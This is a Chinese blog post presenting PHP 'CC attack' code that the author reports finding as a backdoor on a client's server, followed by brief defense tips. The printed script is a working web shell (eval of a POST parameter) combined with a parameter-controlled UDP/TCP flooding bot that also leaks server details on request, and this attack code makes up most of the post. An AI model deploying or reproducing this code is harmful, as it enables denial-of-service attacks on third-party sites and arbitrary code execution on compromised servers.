PHP Socket编程 之 php cc攻击代码与防范方法
今天把客户查找后门的时候发现的代码,特分享下,看到这样的代码就是黑客用来攻击别人访问,不断访问指定网站,导致网站无法访问,我们的网站就是帮凶了,同时我们自己的网站或服务器也会无法访问,所以一定要注意防范。
cc攻击代码,支持udp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 | <?phpeval($_POST[Chr(90)]);set_time_limit(86400);ignore_user_abort(True);$packets = 0;$http = $_GET['http'];$rand = $_GET['exit'];$exec_time = $_GET['time'];if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0){if(StrLen($_GET['rat'])<>0){echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];exit;}echo "Php 2012 Terminator";exit;}for($i=0;$i<65535;$i++){$out .= "X";}//Udp1-fsockopen Udp2 pfsockopen Tcp3 CC.center$max_time = time()+$exec_time;if($rand==53)while(1){$packets++;if(time() > $max_time){break;}$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);if($fp){fwrite($fp, $out);fclose($fp);}}elseif($rand==500)while(1){$packets++;if(time() > $max_time){break;}$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);if($fp){fwrite($fp, $out);fclose($fp);}}elsewhile(1){$packets++;if(time() > $max_time){break;}$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);if($fp){fwrite($fp, $out);fclose($fp);}}?> |
所谓的CC攻击就是对方利用程序或一些代理对您的网站进行不间断的访问,造成您的网站处理不了而处于当机状态
对于cc攻击的防范,如果是动态页面,我们可以判断时间,如果是静态的网站我们就需要服务器上安装防cc攻击的软件了, 一般服务器安全狗还是不错的。
分类:
PHP
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具